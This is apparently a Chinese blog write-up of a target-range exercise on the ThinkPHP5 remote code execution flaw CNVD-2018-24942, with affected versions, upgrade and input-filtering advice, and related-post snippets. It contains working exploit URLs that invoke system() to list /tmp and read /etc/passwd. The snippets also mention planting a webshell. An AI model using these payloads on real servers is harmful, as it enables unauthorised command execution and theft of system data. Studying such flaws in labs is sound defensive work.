ThinkPHP5远程代码执行(CNVD-2018-24942)

已于 2024-04-03 00:37:08 修改
阅读量592 收藏 10
点赞数 4
分类专栏: 靶场计划 文章标签: web安全
于 2024-04-03 00:34:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xnrjyswy/article/details/137301420
版权

一、漏洞描述

ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。

二、影响版本

ThinkPHP 5.0系列 < 5.0.23

ThinkPHP 5.1系列 < 5.1.31

三、POC

在其地址增加路径与参数即可

/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /tmp

四、漏洞复现

URL加路径/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/etc/passwd

获取flag的话用ls /tmp命令即可;

使用ThinkPHP漏洞利用工具:

五、整改建议

  1. 升级到ThinkPHP5的安全版本5.0.23或更高版本。

  2. 如果无法立即升级,可以通过以下方法暂时防御:

    • 检查应用中是否使用了bind方法,如果用于数据绑定,确保所有用户输入被正确清理和转义。

    • 如果不需要使用bind方法,可以考虑移除或者替换掉。

    • 对于用户输入进行严格的验证和过滤,确保不会执行任何不安全的操作。

六、参考链接

Document

GitHub - Lotus6/ThinkphpGUI: Thinkphp(GUI)漏洞利用工具,支持各版本TP漏洞检测,命令执行,getshell。

一颗小黑橙
关注
专栏目录
ThinkPHP Lang文件包含To远程代码执行漏洞复现—CNVD-2022-86535
afei001
12-14 1247
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。ThinkPHP存在命令执行漏洞,该漏洞是由于开启了多语言功能,对参数lang传参过滤不严谨,攻击者可利用该漏洞执行命令。本质是ThinkPHP在开启多语言功能的情况下存在文件包含漏洞,攻击者可以通过get、header、cookie等位置传入参数,ThinkPHP LoadLangPack中存在目录穿越漏洞,然后再利用pearcmd文件包含并结合它的指令config-create创建恶意代码,从而实现远程代码执行
【漏洞复现】CNVD-2022-86535-ThinkphpV6多语言
rm -rf *
01-18 2454
Thinkphp多语言模块漏洞远程命令执行
thinkphp 代码执行 (CNVD-2018-24942)
qq_23003811的博客
07-25 229
ThinkPHP框架 - 是由上海顶想公司开发维护的MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。该漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。1、执行payload。
ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程命令执行漏洞
热门推荐
SoulCat
01-27 3万+
ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程代码执行漏洞 漏洞概述: ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架。借鉴Struts框架的Action对象,同时也使用面向对象的开发结构和MVC模式。1月11日,ThinkPHP官方发布新版本5.0.24,在1月14日和15日发布两个更新,这几次更新都修复了远程代码执行漏洞,对于5.0.x、5.1.x、5....
thinkphp框架远程代码执行
m0_68976043的博客
07-29 490
一定添加--privileged不然只能拉取环境首页不显示。二、thinkphp远程代码执行。vulfocus网上自行下载。
vulfocus——thinkphp代码执行(CNVD-2018-24942)
m0_62063669的博客
09-07 655
ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。4.访问一下http://ip/shell.php,然后用蚁剑连接,在/tmp下找到flag。2.构造payload远程代码执行,在/tmp下获得flag。3.我们还可以通过写入一句话木马的方式获得flag。
ThinkPHP5x 远程代码执行漏洞(CNVD-2018-24942)复现
yzl_007的博客
08-04 1250
ThinkPHP5x 远程代码执行漏洞(CNVD-2018-24942)复现 影响范围 ThinkPHP 5.0.全版本 5.0.13~5.0.19的,这些版本默认情况下config中的app_debug配置项为false,需开启才能存在此漏洞。 漏洞复现 远程代码执行 直接get请求即可 ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=pwd pw
ThinkPHP5--rce远程代码执行
m0_74402888的博客
04-30 834
ThinkPHP5版本中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。
复现Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
NLXHBM的博客
04-16 3011
1.使用以下payload获取phpinfo: /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1 2.构造要执行的payload,获取网站目录文件: /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&
ThinkPHP RCE漏洞分析合集
hackzkaq的博客
03-18 4303
更多黑客技能 公众号:暗网黑客 作者:掌控安全-veek 一. ThinkPHP 5.0.10-3.2.3 缓存函数设计缺陷可导致代码执行 0x00 背景 网站为了提高访问效率往往会将用户访问过的页面存入缓存来减少开销。 而Thinkphp 在使用缓存的时候是将数据序列化,然后存进一个 php 文件中,这使得命令执行等行为成为可能。 0x01 实验环境 系统环境 服务器主机:centOS 7 php 5.4版本,apache2,ThinkPHP 5.0.10 0x02 漏洞利用 将 applicati
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 1222
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
ThinkPhp 代码执行 (CNVD-2018-24942)漏洞复现
beichenyyds的博客
03-03 5133
漏洞介绍 ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。 影响版本: ThinkPHP 5.*,<5.1.31 ThinkPHP <=5.0.23 过程 1.开启靶场环境 2、在其地址增加路径与参数即可,最后是需要执行的命令 ls /tmp http://vulfocus.fofa.so:43095/index.php/?s=index/\think\app/invokefunctio
CNVD-2018-24942漏洞复现
尼德霍格007
07-15 990
CNVD-2018-24942漏洞复现 目标:得到root权限&找到flag.txt 作者:尼德霍格007 时间:2021-7-11 开始 打开靶场 http://45.159.48.193:42798/ 一个简单的getshell方法 远程代码执行 http://45.159.48.193:42798/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1
thinkphp5+远程代码执行_ThinkPHP远程代码执行漏洞
weixin_39673471的博客
11-25 425
网安引领时代,弥天点亮未来漏洞介绍ThinkPHP是一个快速、简单的基于MVC和面向对象的轻量级PHP开发框架。Thinkphp5.x版本中存在一个严重的远程代码执行漏洞。这个漏洞的主要原因是由于框架对控制器名没有进行足够的校验导致在没有开启强制路由的情况下可以构造恶意语句执行远程命令影响范围Thinkphp 5.1.0 - 5.1.31Thinkphp 5.0.5 - 5.0.2...
php 远程 执行,THINKPHP5 远程命令执行
weixin_30420175的博客
03-10 318
漏洞背景前台有回显RCE框架介绍:ThinkPHP是一款运用极广的PHP开发框架。漏洞引入:1.其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。2.其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。漏洞特征网站指...
Thinkphp5x远程执行命令及getshell
最新发布
2201_75891821的博客
08-07 514
靶场:vulhub/thinkphp/5-rcedocker-compose up -d #启动环境。
ThinkPHP5远程命令执行漏洞
qq_45314073的博客
09-20 2052
thinkPHP5漏洞复现
vulfocus thinkphp 代码执行 (CNVD-2018-24942)
03-29
ThinkPHP是一款快速、简单的PHP开发框架,该框架在处理某些特定情况下的输入时存在代码执行漏洞。攻击者可以通过构造恶意的输入数据,利用该漏洞执行任意代码,从而控制服务器。 漏洞影响: ThinkPHP 5.0.x - ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值